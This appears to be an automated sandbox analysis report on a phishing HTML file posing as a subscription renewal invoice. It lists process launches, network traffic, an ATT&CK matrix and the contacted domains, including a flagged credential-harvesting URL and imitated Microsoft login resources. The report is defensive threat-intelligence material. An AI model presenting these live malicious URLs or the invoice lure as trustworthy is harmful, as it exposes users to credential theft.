        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789

        System Summary

        barindex
        Source: Name includes: Subscription_Renewal_Invoice_2025_HKVXTC.htmlInitial sample: invoice
        Source: classification engineClassification label: mal88.phis.winHTML@26/36@34/13
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Subscription_Renewal_Invoice_2025_HKVXTC.html"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2028,i,12400976106869586370,12546143425724789010,262144 /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2028,i,12400976106869586370,12546143425724789010,262144 /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.html
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.html0%Avira URL Cloudsafe
        https://bummings.chiliesdigital.co.za/app/godag.php100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        ooc-g2.tm-4.office.com
        40.99.150.82
        truefalse
          high
          code.jquery.com
          151.101.66.137
          truefalse
            high
            vnondb0nbw.satelitnetkomputer.my.id
            172.67.195.44
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                sni1gl.wpc.omegacdn.net
                152.199.21.175
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    maxcdn.bootstrapcdn.com
                    104.18.10.207
                    truefalse
                      high
                      office.com
                      13.107.6.156
                      truefalse
                        high
                        www.google.com
                        172.217.16.196
                        truefalse
                          high
                          bummings.chiliesdigital.co.za
                          172.67.165.105
                          truefalse
                            unknown
                            www.office.com
                            unknown
                            unknownfalse
                              high
                              outlook.office.com
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  _8443._https.vnondb0nbw.satelitnetkomputer.my.id
                                  unknown
                                  unknownfalse
                                    unknown
                                    officehub.nel.measure.office.net
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                        high
                                        https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                          high
                                          https://bummings.chiliesdigital.co.za/app/godag.phpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                            high
                                            https://code.jquery.com/jquery-3.1.1.min.jsfalse
                                              high
                                              https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svgfalse
                                                high
                                                https://code.jquery.com/jquery-3.3.1.jsfalse
                                                  high
                                                  https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                    high
                                                    https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_kfhrfyfy-sm2tmkm5ficcw2.cssfalse
                                                      high
                                                      https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svgfalse
                                                        high
                                                        https://outlook.office.com/mail/false
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://bugs.webkit.org/show_bug.cgi?id=136851chromecache_95.2.dr, chromecache_102.2.drfalse
                                                            high
                                                            http://jquery.org/licensechromecache_95.2.dr, chromecache_102.2.drfalse
                                                              high
                                                              https://jsperf.com/thor-indexof-vs-for/5chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                high
                                                                https://bugs.jquery.com/ticket/12359chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                  high
                                                                  https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                    high
                                                                    https://html.spec.whatwg.org/#strip-and-collapse-whitespacechromecache_95.2.dr, chromecache_102.2.drfalse
                                                                      high
                                                                      https://promisesaplus.com/#point-75chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                        high
                                                                        https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-achromecache_95.2.dr, chromecache_102.2.drfalse
                                                                          high
                                                                          https://drafts.csswg.org/cssom/#common-serializing-idiomschromecache_95.2.dr, chromecache_102.2.drfalse
                                                                            high
                                                                            https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_95.2.dr, chromecache_102.2.drfalse
                                                                              high
                                                                              https://bugs.webkit.org/show_bug.cgi?id=29084chromecache_102.2.drfalse
                                                                                high
                                                                                https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespacechromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                  high
                                                                                  https://github.com/eslint/eslint/issues/6125chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                    high
                                                                                    https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabledchromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                      high
                                                                                      https://github.com/jquery/jquery/pull/557)chromecache_102.2.drfalse
                                                                                        high
                                                                                        https://github.com/twbs/bootstrap/graphs/contributors)chromecache_94.2.dr, chromecache_106.2.drfalse
                                                                                          high
                                                                                          https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                            high
                                                                                            https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_102.2.drfalse
                                                                                              high
                                                                                              https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                high
                                                                                                https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                  high
                                                                                                  http://opensource.org/licenses/MIT).chromecache_98.2.dr, chromecache_103.2.drfalse
                                                                                                    high
                                                                                                    https://bugs.jquery.com/ticket/13378chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                      high
                                                                                                      https://promisesaplus.com/#point-64chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                        high
                                                                                                        https://promisesaplus.com/#point-61chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                          high
                                                                                                          https://drafts.csswg.org/cssom/#resolved-valueschromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                            high
                                                                                                            https://bugs.chromium.org/p/chromium/issues/detail?id=589347chromecache_102.2.drfalse
                                                                                                              high
                                                                                                              https://html.spec.whatwg.org/multipage/syntax.html#attributes-2chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                high
                                                                                                                https://promisesaplus.com/#point-59chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                  high
                                                                                                                  https://jsperf.com/getall-vs-sizzle/2chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                    high
                                                                                                                    https://promisesaplus.com/#point-57chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                      high
                                                                                                                      https://github.com/eslint/eslint/issues/3229chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                        high
                                                                                                                        https://promisesaplus.com/#point-54chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                          high
                                                                                                                          https://html.spec.whatwg.org/multipage/forms.html#category-listedchromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                            high
                                                                                                                            https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                              high
                                                                                                                              https://developer.mozilla.org/en-US/docs/CSS/displaychromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                high
                                                                                                                                https://jquery.org/licensechromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://jquery.com/chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://getbootstrap.com)chromecache_94.2.dr, chromecache_106.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://bugs.webkit.org/show_bug.cgi?id=137337chromecache_102.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://html.spec.whatwg.org/multipage/scripting.html#selector-enabledchromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_94.2.dr, chromecache_106.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://promisesaplus.com/#point-48chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/jquery/sizzle/pull/225chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://sizzlejs.com/chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://bugs.chromium.org/p/chromium/issues/detail?id=449857chromecache_95.2.dr, chromecache_102.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    104.18.10.207
                                                                                                                                                    maxcdn.bootstrapcdn.comUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    172.67.195.44
                                                                                                                                                    vnondb0nbw.satelitnetkomputer.my.idUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    151.101.66.137
                                                                                                                                                    code.jquery.comUnited States
                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                    104.17.24.14
                                                                                                                                                    unknownUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    172.67.165.105
                                                                                                                                                    bummings.chiliesdigital.co.zaUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    104.18.11.207
                                                                                                                                                    unknownUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    151.101.2.137
                                                                                                                                                    unknownUnited States
                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                    239.255.255.250
                                                                                                                                                    unknownReserved
                                                                                                                                                    unknownunknownfalse
                                                                                                                                                    152.199.21.175
                                                                                                                                                    sni1gl.wpc.omegacdn.netUnited States
                                                                                                                                                    15133EDGECASTUSfalse
                                                                                                                                                    172.217.16.196
                                                                                                                                                    www.google.comUnited States
                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                    104.17.25.14
                                                                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    40.99.150.82
                                                                                                                                                    ooc-g2.tm-4.office.comUnited States
                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                    IP
                                                                                                                                                    192.168.2.4
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1585811
                                                                                                                                                    Start date and time:2025-01-08 09:51:57 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 38s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:7
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:Subscription_Renewal_Invoice_2025_HKVXTC.html
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal88.phis.winHTML@26/36@34/13
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .html
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.250.185.174, 74.125.71.84, 172.217.16.142, 142.250.181.238, 142.250.185.142, 172.217.23.106, 142.250.184.234, 142.250.186.74, 142.250.185.106, 142.250.185.234, 142.250.186.170, 142.250.186.106, 172.217.18.106, 216.58.212.138, 142.250.181.234, 142.250.185.170, 172.217.18.10, 142.250.185.74, 216.58.206.74, 142.250.185.202, 172.217.16.202, 142.250.185.138, 2.16.164.105, 192.229.221.95, 142.250.186.42, 142.250.184.202, 142.250.186.138, 216.58.206.42, 172.217.16.138, 142.250.74.202, 172.217.18.110, 142.250.74.206, 142.250.185.238, 142.250.184.238, 13.107.6.156, 2.16.238.149, 2.16.238.152, 216.58.206.78, 142.250.186.131, 142.250.186.142, 142.250.186.78, 95.101.54.121, 95.101.54.113, 23.56.254.164, 13.107.246.45, 4.245.163.56
                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, update.googleapis.com, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    No simulations
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    104.18.10.207http://desifoodcorner.wb4.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.11632.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.6905.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.32268.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.6905.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                                                                                                    151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • code.jquery.com/jquery-3.3.1.min.js
                                                                                                                                                    http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • code.jquery.com/jquery-1.7.min.js
                                                                                                                                                    http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • code.jquery.com/jquery-1.7.2.min.js
                                                                                                                                                    http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • code.jquery.com/jquery-3.3.1.min.js
                                                                                                                                                    2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • code.jquery.com/jquery-latest.min.js
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    cdnjs.cloudflare.comhttps://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    YOUR TV LICENCE STATEMENT.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    https://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comGet hashmaliciousUnknownBrowse
